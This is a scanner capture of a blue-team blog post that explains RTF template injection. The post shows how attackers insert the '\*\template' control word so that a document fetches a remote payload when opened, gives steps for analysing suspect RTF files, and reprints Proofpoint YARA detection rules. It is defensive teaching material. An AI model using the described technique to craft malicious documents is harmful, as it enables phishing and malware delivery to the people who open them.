letsdefend.io
Open in
urlscan Pro
2606:4700:20::681a:e3d
Public Scan
URL:
https://letsdefend.io/blog/how-to-analyze-rtf-template-injection-attacks/
Submission: On February 15 via manual from BY — Scanned from DE
Submission: On February 15 via manual from BY — Scanned from DE
Form analysis 4 forms found in the DOM
GET https://letsdefend.io/blog/
<form role="search" aria-label="Search for:" method="get" class="search-form" action="https://letsdefend.io/blog/">
<label for="search-form-1">
<span class="screen-reader-text"> Search for: </span>
<input type="search" id="search-form-1" class="search-field" placeholder="Search …" value="" name="s">
</label>
<input type="submit" class="search-submit" value="Search">
</form>POST https://letsdefend.io/blog/wp-comments-post.php
<form action="https://letsdefend.io/blog/wp-comments-post.php" method="post" id="commentform" class="thin max-percentage" novalidate="">
<p class="comment-notes"><span id="email-notes">Your email address will not be published.</span> <span class="required-field-message" aria-hidden="true">Required fields are marked <span class="required" aria-hidden="true">*</span></span></p>
<p class="comment-form-comment"><label for="comment">Comment <span class="required" aria-hidden="true">*</span></label> <textarea id="comment" name="comment" cols="45" rows="8" maxlength="65525" required=""></textarea></p>
<p class="comment-form-author"><label for="author">Name <span class="required" aria-hidden="true">*</span></label> <input id="author" name="author" type="text" value="" size="30" maxlength="245" required=""></p>
<p class="comment-form-email"><label for="email">Email <span class="required" aria-hidden="true">*</span></label> <input id="email" name="email" type="email" value="" size="30" maxlength="100" aria-describedby="email-notes" required=""></p>
<p class="comment-form-url"><label for="url">Website</label> <input id="url" name="url" type="url" value="" size="30" maxlength="200"></p>
<p class="comment-form-cookies-consent"><input id="wp-comment-cookies-consent" name="wp-comment-cookies-consent" type="checkbox" value="yes"> <label for="wp-comment-cookies-consent">Save my name, email, and website in this browser for the next time
I comment.</label></p>
<p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Post Comment"> <input type="hidden" name="comment_post_ID" value="363" id="comment_post_ID">
<input type="hidden" name="comment_parent" id="comment_parent" value="0">
</p>
</form>GET https://letsdefend.io/blog/
<form role="search" method="get" class="search-form" action="https://letsdefend.io/blog/">
<label for="search-form-2">
<span class="screen-reader-text"> Search for: </span>
<input type="search" id="search-form-2" class="search-field" placeholder="Search …" value="" name="s">
</label>
<input type="submit" class="search-submit" value="Search">
</form>Name: mc-embedded-subscribe-form — POST https://letsdefend.us14.list-manage.com/subscribe/post?u=74bda5edf824cea8aad36e707&id=b5b70df1e0
<form action="https://letsdefend.us14.list-manage.com/subscribe/post?u=74bda5edf824cea8aad36e707&id=b5b70df1e0" method="post" id="mc-embedded-subscribe-form" name="mc-embedded-subscribe-form" class="validate" target="_blank" novalidate="">
<div id="mc_embed_signup_scroll">
<h2>Subscribe</h2>
<div class="mc-field-group">
<label for="mce-EMAIL">Email Address <span class="asterisk">*</span>
</label>
<input type="email" value="" name="EMAIL" class="required email" id="mce-EMAIL">
</div>
<div hidden="true"><input type="hidden" name="tags" value="7162497"></div>
<div id="mce-responses" class="clear">
<div class="response" id="mce-error-response" style="display:none"></div>
<div class="response" id="mce-success-response" style="display:none"></div>
</div> <!-- real people should not fill this in and expect good things - do not remove this or risk form bot signups-->
<div style="position: absolute; left: -5000px;" aria-hidden="true"><input type="text" name="b_74bda5edf824cea8aad36e707_b5b70df1e0" tabindex="-1" value=""></div>
<div class="clear"><input type="submit" value="Subscribe" name="subscribe" id="mc-embedded-subscribe" class="button"></div>
</div>
</form>Text Content
Skip to the content
LetsDefend Blue Team Blog
.cls-1{fill:%23313335}
Search for:
Close search
* Home
* Posts
* Detection
* How to Analyze RTF Template Injection Attacks
Categories
Detection Malware
HOW TO ANALYZE RTF TEMPLATE INJECTION ATTACKS
* Post author .cls-1{fill:%23313335} By Admin
* Post date .cls-1{fill:%23313335} January 21, 2022
* No Comments on How to Analyze RTF Template Injection Attacks
Proofpoint security researchers state that cyber attack groups have adopted a
new technique called “RTF Template Injection” and reported that this technique
has a low detection rate. It is also included in the report that phishing
attacks were carried out on many institutions with the help of RTF Template
Injection technique in 2021 by cyber threat groups in India, China and Russia.
Let’s take a look at what this technique is, how it is exploited by attackers,
how to analyze a file with RTF format and how to detect RTF Template Injection
attacks.
WHAT IS RTF TEMPLATE INJECTION?
Rich Text Format (RTF) is a file format that determines how texts are formatted.
It was developed by Microsoft between 1987-2008. You can find Rich Text Format
(RTF) Version 1.5 specifications here.
RTF file format consists of unformatted text, control words, control symbols and
groups. RTF readers use them to allow the text to be displayed in a certain
format.
The RTF template control word is used to specify how to format the document
using the specified template. The specified templates are usually located on the
local device. However, attackers exploit the RTF template feature to download
malicious payloads from a remote server under their control.
HOW ATTACKERS LEVERAGE RTF TEMPLATE FEATURE?
In order to perform a successful analysis, we must first understand how the
attack takes place. Let’s take a look at how attackers exploit the RTF template
feature.
When we examine the Rich Text Format v1.5 specifications, we see that there are
many control words for formatting the document. When we look at the
“\*\template” control word, we see that this control word is used to specify the
target template file so that the document can be formatted.
The attackers are able to download the malicious payload from the URL they
provided by using the “\*\template” control word. For this, the attackers give
the URL addresses of the servers under their control instead of a legitimate
template file, causing the download of the malicious payload as soon as the file
is opened. All attackers have to do to make the RTF document malicious is to
insert the “\*\template” control word with any Hex Editor tool. Attackers can
add the “\*\template” control word to the document with the help of the Hex
Editor, or they can change the RTF document properties with the “\*\template”
control word so that the malicious payload is downloaded when the document is
opened.
In the article published by Proofpoint, it is stated that the “DoNot” attacker
group added the “\*\template” control word to the List Overwrite Table, the
“TA423” attacker group added it by replacing the pre-existing font family
control word, and the “Gamaredon” attack group added it through the same method
as the “DoNot” attack group.
When the samples examined where “DoNot”, “TA423” and “Gamaredon” attack groups
use the RTF Template Injection technique, “TA423” and “Gamaredon” attack groups
used the URL with malicious payload as plain text; and “DoNot” attack group used
Unicode signed character notation.
DoNot APT Group Sample – 03674b4f49ea0fef46fd83d5cdb27443
HOW TO ANALYZE RTF FILES?
Now that we understand how the attack happened, we can move on to how to analyze
a suspicious RTF document.
First, we need to confirm whether the sample we have is really a file with RTF
format.
You can confirm the document whether it is indeed in RTF format or not by
checking the magic byte value of the sample you have. You can confirm that it is
an RTF file if the magic byte value of the file is the same as the magic byte
value of the RTF format ({\rtf ). The extension of files with the RTF file
format is “.rtf“. However, there is no guarantee that the file is an RTF file
based on the file extension alone. For this reason, it would be more accurate to
do your checks over the magic byte.
As we mentioned in our article, the “\*\template” control word must be added to
the RTF document by the attackers in order for the RTF Template Injection attack
to take place. Since this step is necessary for the attack to be successful, you
can search for the “\*\template” control word while tracking the traces of the
RTF Template Injection attack in the sample you have. We cannot look at a
specific part of the file as this control word has no specific offset. We need
to do our search within the entire file.
Almost all Hex Editors allow searching within the file. You can make your
searches using this feature of Hex Editors.
If you do not have the chance to use the Hex Editor, you can find the
“\*\template” control word by searching among the strings in the file with the
help of tools such as Bin Text, strings.
As we mentioned in our article, attackers can add URL addresses as plain text or
unicode signed character notation. For this reason, you may need to decode it to
obtain the URL address. After obtaining the URL address added by the attacker,
you should continue the analysis by analyzing the malicious payload.
Using the dynamic analysis method when analyzing RTF files will allow you to
detect the malicious URL address faster. You can detect the sent HTTP request
faster by using network capture applications.
APT GROUPS
Some of the cyber threat groups using the RTF Template Injection technique are
as follows:
* Gamaredon
* DoNot
* TA423
Although the attack groups using the RTF Template Injection technique are
limited at the moment, it will not take long for groups to adopt the RTF
Template Injection technique just like other groups like “APT28”, and
“Inception”.
MITRE ATT&CK
https://attack.mitre.org/techniques/T1221/
TacticTechniqueDefense Evasion (TA0005)Template Injection (T1221)
YARA RULES
You can create YARA rules to detect RTF Template Injection attacks. Below are
the YARA rules prepared by Proofpoint:
{
meta:
author = "Proofpoint Threat Research"
description = "Detects malicious RTFs using RTF Template Injection to Retrieve
Remote Content from a URL"
disclaimer = "Yara signature created for hunting purposes - not quality controlled
within enterprise environment"
hash1 = " 43538d9010462668721f178efaeca89f95f6f35a "
hash2 = " b5ec74e127ce9dfcb1b3bd9072c1d554b59b4005 "
strings:
$rtf = { 7b 5c 72 74 66 } //rtf_bytes
$s1 = "{\\*\\template http" ascii nocase //https_intentionally_not_specified
condition:
$rtf at 0 and $s1
}
rule Proofpoint_RTFtemplateInjection_Technique_Generic_Unicode_16Bit
{
meta:
author = "Proofpoint Threat Research"
description = "Detects malicious RTFs using RTF Template Injection to Retrieve Remote
Content from Unicode 16 Bit Encoded URL"
disclaimer = "Yara signature created for hunting purposes - not quality controlled
within enterprise environment"
hash1 = " fbc8064399008fe20f350f0de5e4bbf5833847c7 "
hash2 = "6c01fe16e8cffa3049e84707672b82dc32f1cf72 "
strings:
$rtf = { 7b 5c 72 74 66 } //rtf_bytes
$s1 = {7B 5C 2A 5C 74 65 6D 70 6C 61 74 65 20 0D 0A 5C 75 2D } //{\*\template \u-
condition:
$rtf at 0 and $s1
}
REFERENCE
https://www.proofpoint.com/us/blog/threat-insight/injection-new-black-novel-rtf-template-inject-technique-poised-widespread
Share on social media
* Tags .cls-1{fill:%23313335} analyze rtf file, rtf template injection
← How to Become a SOC Analyst: in 2022 → Red Team vs Blue Team: Learn the
Difference
LEAVE A REPLY CANCEL REPLY
Your email address will not be published. Required fields are marked *
Comment *
Name *
Email *
Website
Save my name, email, and website in this browser for the next time I comment.
Search for:
SUBSCRIBE
Email Address *
CATEGORIES
* Attacking
* Cyber Security
* Detection
* Incident Response
* Malware
* News
* Phishing
* Python
* SIEM
* SOC Analyst
* Success Story
* Writeup
*
Credence Powered by WordPress
↑ ↑